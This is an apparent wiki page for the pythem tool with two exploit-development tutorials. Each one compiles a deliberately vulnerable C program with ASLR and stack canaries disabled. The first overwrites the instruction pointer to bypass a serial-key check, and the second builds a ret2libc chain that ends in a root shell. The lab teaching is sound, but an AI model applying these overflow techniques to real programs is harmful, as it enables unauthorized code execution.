-
Notifications
You must be signed in to change notification settings - Fork 325
Exploit development
m4n3dw0lf edited this page Aug 16, 2016
·
16 revisions
#Exploit Development
##Exploit Development 1: Overwriting Instruction Pointer
- Vulnerable Serial-Key C program.
//Code from "Shellcoder's Handbook: Discovering and Exploiting Security Holes"
//Disable Canaries, Compile: gcc serial.c -fno-stack-protector -o serial
//Disable ASLR, echo 0 > /proc/sys/kernel/randomize_va_space
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int valid_serial(char *psz){
size_t len = strlen(psz);
unsigned total = 0;
size_t i;
if (len < 10)
return 0;
for(i = 0; i < len ; i++){
if ((psz[i] < '0') || (psz[i] > 'z' ))
return 0;
total += psz[i];
}
if (total % 853 == 83)
return 1;
return 0;
}
int validate_serial(){
char serial[24];
fscanf(stdin, "%s", serial);
if (valid_serial(serial))
return 1;
else
return 0;
}
int do_valid_stuff(){
printf("The serial number is valid!\n");
// do serial-restricted, valid stuff here.
exit(0);
}
int do_invalid_stuff(){
printf("Invalid serial number!\nExiting\n");
exit(1);
}
int main(int argc, char *argv[] ){
if(validate_serial())
do_valid_stuff();
else
do_invalid_stuff();
return 0;
}
- commands:
pythem> echo 0 > /proc/sys/kernel/randomize_va_space
pythem> gcc serial.c -fno-stack-protector -o serial
pythem> ./serial
123456
Invalid serial number!
Exiting
pythem> set file ./serial
pythem> xploit stdin
xploit> disas main
Dump of assembler code for function main:
...
callq 0x400723 <do_valid_stuff> (Function that only authenticated person has access.)
...
xploit> fuzz
...
[*] Sending buffer with lenght: 39
[*] Child program exited with code 1
[*] Hit enter to continue.
[*] Sending buffer with lenght: 40
[*] Sending buffer with lenght: 41
[*] Child program crashed with SIGSEGV code: -11
^C
xploit> set arch x64
xploit> set offset
[+] Enter the offset (number of 'A's): 40
xploit> set addr1
[+] First address to overwrite: 0x400723
xploit> xploit
[+] Writing payload into buffer.txt
[*] Sending buffer with lenght: 58
The serial number is valid!
Exiting
##Exploit Development 2: Ret2libc
- Buffer-Overflow vulnerable C program.
// Disable Canaries, Compile: gcc -fno-stack-protector vuln.c -o vuln
// Disable ASLR, echo 0 > /proc/sys/kernel/randomize_va_space
#include <stdio.h>
#include <unistd.h>
int vuln() {
char buf[40];
int r;
r = read(0, buf, 200);
printf("\nRead %d bytes. buf is %s\n", r, buf);
return 0;
}
int main(int argc, char *argv[]) {
printf("Try to sh");
vuln();
return 0;
}
- commands:
pythem> echo 0 > /proc/sys/kernel/randomize_va_space
pythem> gcc vuln.c -fno-stack-protector -o vuln
pythem> set file ./vuln
pythem> xploit stdin
xploit> set arch x64
xploit> fuzz
...
[*] Sending buffer with lenght: 48
...
[*] Child program exited with code: 0
[*] Hit enter to continue.
[*] Sending buffer with lenght: 49
...
[*] Child program crashed with SIGSEGV code: -11
...
[+] Sending buffer with lenght: 55
...
[+] Instruction Pointer may be near: 55
[*] Child program crashed with code: -7
...
[*] Sending buffer with lenght: 58
...
[*] Child program crashed with SIGSEGV code: -11
^C
Offset around 55 and 58
xploit> set offset 56
xploit> search instructions
[+] Find: % rdi
...
[INFO] File: ./vuln
0x0000000000400613: pop rdi; ret;
xploit> set addr1
[+] First address to overwrite: 0x0000000000400613
xploit> find "/bin/sh"
...
Found 1 results, display max 1 items:
libc : 0x7ffff7b9c598 --> 0x68732f6e69622f ('/bin/sh')
xploit> set addr2
[+] Second address to overwrite: 0x7ffff7b9c598
xploit> p system
...
$1 = {<text variable, no debug info>} 0x7ffff7a76710 <__libc_system>
xploit> set shellcode
[+] Enter the shellcode: 0x7ffff7a76710
xploit> xploit
[+] Writing payload into buffer.txt
[*] Sending buffer with lenght: 98
...
[!] If it does not work automatically, run on terminal: (cat buffer.txt ; cat) | ./vuln
xploit> exit
pythem> exit
# (cat buffer.txt; cat) | ./vuln
Try to bash
Read 98 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAb
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root